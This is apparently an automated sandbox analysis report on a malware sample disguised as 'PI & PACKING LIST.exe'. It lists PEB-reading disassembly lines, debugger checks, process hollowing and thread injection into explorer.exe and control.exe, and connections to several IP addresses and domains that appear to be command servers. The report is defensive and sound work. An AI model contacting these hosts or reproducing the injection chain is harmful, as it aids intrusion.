Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_01262581 mov eax, dword ptr fs:[00000030h] 2_2_01262581
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_01262581 mov eax, dword ptr fs:[00000030h] 2_2_01262581
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_01232D8A mov eax, dword ptr fs:[00000030h] 2_2_01232D8A
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_01232D8A mov eax, dword ptr fs:[00000030h] 2_2_01232D8A
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_01232D8A mov eax, dword ptr fs:[00000030h] 2_2_01232D8A
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_01232D8A mov eax, dword ptr fs:[00000030h] 2_2_01232D8A
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_01232D8A mov eax, dword ptr fs:[00000030h] 2_2_01232D8A
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012F2D82 mov eax, dword ptr fs:[00000030h] 2_2_012F2D82
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012F2D82 mov eax, dword ptr fs:[00000030h] 2_2_012F2D82
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012F2D82 mov eax, dword ptr fs:[00000030h] 2_2_012F2D82
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012F2D82 mov eax, dword ptr fs:[00000030h] 2_2_012F2D82
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012F2D82 mov eax, dword ptr fs:[00000030h] 2_2_012F2D82
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012F2D82 mov eax, dword ptr fs:[00000030h] 2_2_012F2D82
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012F2D82 mov eax, dword ptr fs:[00000030h] 2_2_012F2D82
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0126FD9B mov eax, dword ptr fs:[00000030h] 2_2_0126FD9B
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0126FD9B mov eax, dword ptr fs:[00000030h] 2_2_0126FD9B
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0124D5E0 mov eax, dword ptr fs:[00000030h] 2_2_0124D5E0
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0124D5E0 mov eax, dword ptr fs:[00000030h] 2_2_0124D5E0
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012FFDE2 mov eax, dword ptr fs:[00000030h] 2_2_012FFDE2
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012FFDE2 mov eax, dword ptr fs:[00000030h] 2_2_012FFDE2
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012FFDE2 mov eax, dword ptr fs:[00000030h] 2_2_012FFDE2
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012FFDE2 mov eax, dword ptr fs:[00000030h] 2_2_012FFDE2
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012E8DF1 mov eax, dword ptr fs:[00000030h] 2_2_012E8DF1
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012B6DC9 mov eax, dword ptr fs:[00000030h] 2_2_012B6DC9
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012B6DC9 mov eax, dword ptr fs:[00000030h] 2_2_012B6DC9
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012B6DC9 mov eax, dword ptr fs:[00000030h] 2_2_012B6DC9
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012B6DC9 mov ecx, dword ptr fs:[00000030h] 2_2_012B6DC9
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012B6DC9 mov eax, dword ptr fs:[00000030h] 2_2_012B6DC9
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012B6DC9 mov eax, dword ptr fs:[00000030h] 2_2_012B6DC9
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0126BC2C mov eax, dword ptr fs:[00000030h] 2_2_0126BC2C
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012B6C0A mov eax, dword ptr fs:[00000030h] 2_2_012B6C0A
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012B6C0A mov eax, dword ptr fs:[00000030h] 2_2_012B6C0A
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012B6C0A mov eax, dword ptr fs:[00000030h] 2_2_012B6C0A
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012B6C0A mov eax, dword ptr fs:[00000030h] 2_2_012B6C0A
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012F1C06 mov eax, dword ptr fs:[00000030h] 2_2_012F1C06
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012F1C06 mov eax, dword ptr fs:[00000030h] 2_2_012F1C06
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012F1C06 mov eax, dword ptr fs:[00000030h] 2_2_012F1C06
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012F1C06 mov eax, dword ptr fs:[00000030h] 2_2_012F1C06
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012F1C06 mov eax, dword ptr fs:[00000030h] 2_2_012F1C06
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012F1C06 mov eax, dword ptr fs:[00000030h] 2_2_012F1C06
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012F1C06 mov eax, dword ptr fs:[00000030h] 2_2_012F1C06
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012F1C06 mov eax, dword ptr fs:[00000030h] 2_2_012F1C06
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012F1C06 mov eax, dword ptr fs:[00000030h] 2_2_012F1C06
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012F1C06 mov eax, dword ptr fs:[00000030h] 2_2_012F1C06
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012F1C06 mov eax, dword ptr fs:[00000030h] 2_2_012F1C06
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012F1C06 mov eax, dword ptr fs:[00000030h] 2_2_012F1C06
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012F1C06 mov eax, dword ptr fs:[00000030h] 2_2_012F1C06
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012F1C06 mov eax, dword ptr fs:[00000030h] 2_2_012F1C06
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0130740D mov eax, dword ptr fs:[00000030h] 2_2_0130740D
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0130740D mov eax, dword ptr fs:[00000030h] 2_2_0130740D
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0130740D mov eax, dword ptr fs:[00000030h] 2_2_0130740D
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0125746D mov eax, dword ptr fs:[00000030h] 2_2_0125746D
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0125B477 mov eax, dword ptr fs:[00000030h] 2_2_0125B477
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0125B477 mov eax, dword ptr fs:[00000030h] 2_2_0125B477
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0125B477 mov eax, dword ptr fs:[00000030h] 2_2_0125B477
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0125B477 mov eax, dword ptr fs:[00000030h] 2_2_0125B477
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0125B477 mov eax, dword ptr fs:[00000030h] 2_2_0125B477
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0125B477 mov eax, dword ptr fs:[00000030h] 2_2_0125B477
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0125B477 mov eax, dword ptr fs:[00000030h] 2_2_0125B477
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0125B477 mov eax, dword ptr fs:[00000030h] 2_2_0125B477
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0125B477 mov eax, dword ptr fs:[00000030h] 2_2_0125B477
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0125B477 mov eax, dword ptr fs:[00000030h] 2_2_0125B477
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0125B477 mov eax, dword ptr fs:[00000030h] 2_2_0125B477
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0125B477 mov eax, dword ptr fs:[00000030h] 2_2_0125B477
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0126AC7B mov eax, dword ptr fs:[00000030h] 2_2_0126AC7B
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0126AC7B mov eax, dword ptr fs:[00000030h] 2_2_0126AC7B
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0126AC7B mov eax, dword ptr fs:[00000030h] 2_2_0126AC7B
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0126AC7B mov eax, dword ptr fs:[00000030h] 2_2_0126AC7B
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0126AC7B mov eax, dword ptr fs:[00000030h] 2_2_0126AC7B
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0126AC7B mov eax, dword ptr fs:[00000030h] 2_2_0126AC7B
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0126AC7B mov eax, dword ptr fs:[00000030h] 2_2_0126AC7B
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0126AC7B mov eax, dword ptr fs:[00000030h] 2_2_0126AC7B
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0126AC7B mov eax, dword ptr fs:[00000030h] 2_2_0126AC7B
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0126AC7B mov eax, dword ptr fs:[00000030h] 2_2_0126AC7B
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0126AC7B mov eax, dword ptr fs:[00000030h] 2_2_0126AC7B
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0126A44B mov eax, dword ptr fs:[00000030h] 2_2_0126A44B
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012CC450 mov eax, dword ptr fs:[00000030h] 2_2_012CC450
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012CC450 mov eax, dword ptr fs:[00000030h] 2_2_012CC450
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012F4496 mov eax, dword ptr fs:[00000030h] 2_2_012F4496
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012F4496 mov eax, dword ptr fs:[00000030h] 2_2_012F4496
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012F4496 mov eax, dword ptr fs:[00000030h] 2_2_012F4496
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012F4496 mov eax, dword ptr fs:[00000030h] 2_2_012F4496
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012F4496 mov eax, dword ptr fs:[00000030h] 2_2_012F4496
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012F4496 mov eax, dword ptr fs:[00000030h] 2_2_012F4496
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012F4496 mov eax, dword ptr fs:[00000030h] 2_2_012F4496
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012F4496 mov eax, dword ptr fs:[00000030h] 2_2_012F4496
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012F4496 mov eax, dword ptr fs:[00000030h] 2_2_012F4496
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012F4496 mov eax, dword ptr fs:[00000030h] 2_2_012F4496
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012F4496 mov eax, dword ptr fs:[00000030h] 2_2_012F4496
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012F4496 mov eax, dword ptr fs:[00000030h] 2_2_012F4496
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012F4496 mov eax, dword ptr fs:[00000030h] 2_2_012F4496
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0124849B mov eax, dword ptr fs:[00000030h] 2_2_0124849B
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012F14FB mov eax, dword ptr fs:[00000030h] 2_2_012F14FB
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012B6CF0 mov eax, dword ptr fs:[00000030h] 2_2_012B6CF0
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012B6CF0 mov eax, dword ptr fs:[00000030h] 2_2_012B6CF0
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012B6CF0 mov eax, dword ptr fs:[00000030h] 2_2_012B6CF0
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_01308CD6 mov eax, dword ptr fs:[00000030h] 2_2_01308CD6
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_01234F2E mov eax, dword ptr fs:[00000030h] 2_2_01234F2E
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_01234F2E mov eax, dword ptr fs:[00000030h] 2_2_01234F2E
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0126E730 mov eax, dword ptr fs:[00000030h] 2_2_0126E730
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0125B73D mov eax, dword ptr fs:[00000030h] 2_2_0125B73D
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0125B73D mov eax, dword ptr fs:[00000030h] 2_2_0125B73D
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0126A70E mov eax, dword ptr fs:[00000030h] 2_2_0126A70E
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0126A70E mov eax, dword ptr fs:[00000030h] 2_2_0126A70E
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0125F716 mov eax, dword ptr fs:[00000030h] 2_2_0125F716
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012CFF10 mov eax, dword ptr fs:[00000030h] 2_2_012CFF10
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012CFF10 mov eax, dword ptr fs:[00000030h] 2_2_012CFF10
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0130070D mov eax, dword ptr fs:[00000030h] 2_2_0130070D
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0130070D mov eax, dword ptr fs:[00000030h] 2_2_0130070D
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0124FF60 mov eax, dword ptr fs:[00000030h] 2_2_0124FF60
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_01308F6A mov eax, dword ptr fs:[00000030h] 2_2_01308F6A
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0124EF40 mov eax, dword ptr fs:[00000030h] 2_2_0124EF40
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_01248794 mov eax, dword ptr fs:[00000030h] 2_2_01248794
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012B7794 mov eax, dword ptr fs:[00000030h] 2_2_012B7794
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012B7794 mov eax, dword ptr fs:[00000030h] 2_2_012B7794
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012B7794 mov eax, dword ptr fs:[00000030h] 2_2_012B7794
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012737F5 mov eax, dword ptr fs:[00000030h] 2_2_012737F5
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0123E620 mov eax, dword ptr fs:[00000030h] 2_2_0123E620
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012EFE3F mov eax, dword ptr fs:[00000030h] 2_2_012EFE3F
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0123C600 mov eax, dword ptr fs:[00000030h] 2_2_0123C600
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0123C600 mov eax, dword ptr fs:[00000030h] 2_2_0123C600
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0123C600 mov eax, dword ptr fs:[00000030h] 2_2_0123C600
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_01268E00 mov eax, dword ptr fs:[00000030h] 2_2_01268E00
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012F1608 mov eax, dword ptr fs:[00000030h] 2_2_012F1608
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0126A61C mov eax, dword ptr fs:[00000030h] 2_2_0126A61C
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0126A61C mov eax, dword ptr fs:[00000030h] 2_2_0126A61C
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0124766D mov eax, dword ptr fs:[00000030h] 2_2_0124766D
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0125AE73 mov eax, dword ptr fs:[00000030h] 2_2_0125AE73
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0125AE73 mov eax, dword ptr fs:[00000030h] 2_2_0125AE73
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0125AE73 mov eax, dword ptr fs:[00000030h] 2_2_0125AE73
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0125AE73 mov eax, dword ptr fs:[00000030h] 2_2_0125AE73
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0125AE73 mov eax, dword ptr fs:[00000030h] 2_2_0125AE73
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_01247E41 mov eax, dword ptr fs:[00000030h] 2_2_01247E41
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_01247E41 mov eax, dword ptr fs:[00000030h] 2_2_01247E41
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_01247E41 mov eax, dword ptr fs:[00000030h] 2_2_01247E41
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_01247E41 mov eax, dword ptr fs:[00000030h] 2_2_01247E41
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_01247E41 mov eax, dword ptr fs:[00000030h] 2_2_01247E41
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_01247E41 mov eax, dword ptr fs:[00000030h] 2_2_01247E41
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012FAE44 mov eax, dword ptr fs:[00000030h] 2_2_012FAE44
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012FAE44 mov eax, dword ptr fs:[00000030h] 2_2_012FAE44
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012B46A7 mov eax, dword ptr fs:[00000030h] 2_2_012B46A7
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_01300EA5 mov eax, dword ptr fs:[00000030h] 2_2_01300EA5
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_01300EA5 mov eax, dword ptr fs:[00000030h] 2_2_01300EA5
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_01300EA5 mov eax, dword ptr fs:[00000030h] 2_2_01300EA5
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012CFE87 mov eax, dword ptr fs:[00000030h] 2_2_012CFE87
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012616E0 mov ecx, dword ptr fs:[00000030h] 2_2_012616E0
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012476E2 mov eax, dword ptr fs:[00000030h] 2_2_012476E2
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_01278EC7 mov eax, dword ptr fs:[00000030h] 2_2_01278EC7
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_01308ED6 mov eax, dword ptr fs:[00000030h] 2_2_01308ED6
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012636CC mov eax, dword ptr fs:[00000030h] 2_2_012636CC
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012EFEC0 mov eax, dword ptr fs:[00000030h] 2_2_012EFEC0
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\control.exe Process queried: DebugPort Jump to behavior
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_01279910 NtAdjustPrivilegesToken,LdrInitializeThunk, 2_2_01279910
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Network Connect: 35.78.89.117 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 162.43.120.154 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 142.250.203.115 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.bengalindex.com
Source: C:\Windows\explorer.exe Domain query: www.nu2uresale.store
Source: C:\Windows\explorer.exe Network Connect: 209.99.64.33 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.zkjk888.com
Source: C:\Windows\explorer.exe Network Connect: 178.128.239.245 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.p-soils.com
Source: C:\Windows\explorer.exe Domain query: www.cpitherapy.com
Source: C:\Windows\explorer.exe Domain query: www.gebouwpas.online
Sample uses process hollowing technique
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Section unmapped: C:\Windows\SysWOW64\control.exe base address: 1360000 Jump to behavior
Maps a DLL or memory area into another process
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Section loaded: unknown target: C:\Windows\SysWOW64\control.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Section loaded: unknown target: C:\Windows\SysWOW64\control.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\control.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\control.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Injects a PE file into a foreign processes
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Memory written: C:\Users\user\Desktop\PI & PACKING LIST.exe base: 400000 value starts with: 4D5A Jump to behavior
Queues an APC in another process (thread injection)
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Thread APC queued: target process: C:\Windows\explorer.exe Jump to behavior
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Thread register set: target process: 3452 Jump to behavior
Source: C:\Windows\SysWOW64\control.exe Thread register set: target process: 3452 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Process created: C:\Users\user\Desktop\PI & PACKING LIST.exe C:\Users\user\Desktop\PI & PACKING LIST.exe Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Process created: C:\Users\user\Desktop\PI & PACKING LIST.exe C:\Users\user\Desktop\PI & PACKING LIST.exe Jump to behavior
Source: explorer.exe, 00000003.00000000.307333028.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.332009342.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.264215848.0000000001980000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Program ManagerT7<=ge
Source: explorer.exe, 00000003.00000000.336206655.0000000006770000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.340849752.00000000090D8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.321402743.00000000090D8000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000003.00000000.307333028.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.332009342.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.264215848.0000000001980000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000003.00000000.331517747.0000000001378000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.263416995.0000000001378000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CProgmanile
Source: explorer.exe, 00000003.00000000.307333028.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.332009342.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.264215848.0000000001980000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Users\user\Desktop\PI & PACKING LIST.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation Jump to behavior
